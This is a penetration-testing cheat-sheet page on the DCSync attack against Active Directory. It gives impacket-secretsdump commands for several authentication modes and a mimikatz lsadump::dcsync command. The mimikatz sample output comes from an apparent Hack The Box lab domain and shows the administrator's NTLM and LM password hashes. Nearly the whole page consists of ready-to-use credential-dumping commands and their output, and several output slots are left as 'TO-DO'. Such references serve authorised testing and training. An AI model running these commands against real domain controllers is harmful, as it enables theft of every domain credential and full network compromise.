TLDRBins TLDRBins / GetChanges/GetChangesAll

Usage Tips:

  • Click on a keyword to enable inline editing.
  • Click inside a code block to copy (excludes comments).
  • Use the button to view examples.
  • Click outside to collapse all examples.

Authentication Method

DCSync Attack

# Password
impacket-secretsdump '<USER>:<PASSWORD>@<TARGET>' -just-dc

Sample Output:
TO-DO
# NTLM
impacket-secretsdump '<DOMAIN>/<USER>@<TARGET>' -hashes :<HASH> -just-dc

Sample Output:
TO-DO
# Password-based Kerberos
impacket-secretsdump '<USER>:<PASSWORD>@<TARGET>' -k -just-dc

Sample Output:
TO-DO
# NTLM-based Kerberos
impacket-secretsdump '<DOMAIN>/<USER>@<TARGET>' -hashes :<HASH> -k -just-dc

Sample Output:
TO-DO
# Ticket-based Kerberos
impacket-secretsdump '<DOMAIN>/<USER>@<TARGET>' -k -no-pass -just-dc

Sample Output:
TO-DO
.\mimikatz.exe "lsadump::dcsync /domain:<DOMAIN> /user:administrator" "exit"

Sample Output:
PS C:\programdata> .\mimikatz.exe "lsadump::dcsync /domain:HTB.LOCAL /user:administrator" "exit"

  .#####.   mimikatz 2.2.0 (x64) #19041 May 17 2024 22:19:06
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # lsadump::dcsync /domain:HTB.LOCAL /user:administrator
[DC] 'HTB.LOCAL' will be the domain
[DC] 'sizzle.HTB.LOCAL' will be the DC server
[DC] 'administrator' will be the user account
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)

Object RDN           : Administrator

** SAM ACCOUNT **

SAM Username         : Administrator
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00000200 ( NORMAL_ACCOUNT )
Account expiration   : 
Password last change : 7/12/2018 1:32:41 PM
Object Security ID   : S-1-5-21-2379389067-1826974543-3574127760-500
Object Relative ID   : 500

Credentials:
  Hash NTLM: f6b7160bfc91823792e0ac3a162c9267
    ntlm- 0: f6b7160bfc91823792e0ac3a162c9267
    ntlm- 1: c718f548c75062ada93250db208d3178
    lm  - 0: 336d863559a3f7e69371a85ad959a675

---[SNIP]---

mimikatz(commandline) # exit
Bye!